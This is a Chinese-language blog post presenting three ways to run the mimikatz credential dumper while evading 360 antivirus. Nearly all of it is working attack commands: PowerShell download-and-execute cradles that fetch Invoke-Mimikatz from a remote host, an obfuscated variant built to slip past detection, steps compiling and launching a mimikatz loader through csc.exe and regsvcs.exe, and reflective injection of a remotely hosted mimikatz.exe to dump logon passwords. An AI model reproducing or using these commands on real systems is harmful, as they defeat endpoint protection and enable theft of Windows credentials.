前言

平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。

下载最新版360
请输入图片描述

未经处理的mimikatz直接就被杀了 :shock:
请输入图片描述
下面开始进行绕过360抓密码

姿势一-powershell

https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1

cmd下执行

C:UserstestDesktop>powershell -exec bypass "import-module .Invoke-Mimikatz.ps1;Invoke-Mimikatz"

也可以远程加载

powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz

但是powershell被360拦截
请输入图片描述
简单混淆就bypass了

powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"

请输入图片描述

姿势二-用.net2.0加载mimikatz

下载

https://gist.githubusercontent.com/nicholasmckinney/896b508b6cf1e8c3e567ccab29c8d3ec/raw/afa7219adbfcdfc160c163273ef8ec61ff0658b4/katz.cs

katz.cs放置C:WindowsMicrosoft.NETFrameworkv2.0.50727

powoershell执行

$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte

再cmd执行

C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs

C:WindowsMicrosoft.NETFrameworkv2.0.50727regsvcs.exe katz.exe

请输入图片描述

姿势三内存中加载mimikatz

下载

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1

执行

powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.101/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLR

请输入图片描述
QQ截图20181010224500.png

Last modification:March 10th, 2019 at 10:06 pm
正在沿街乞讨中……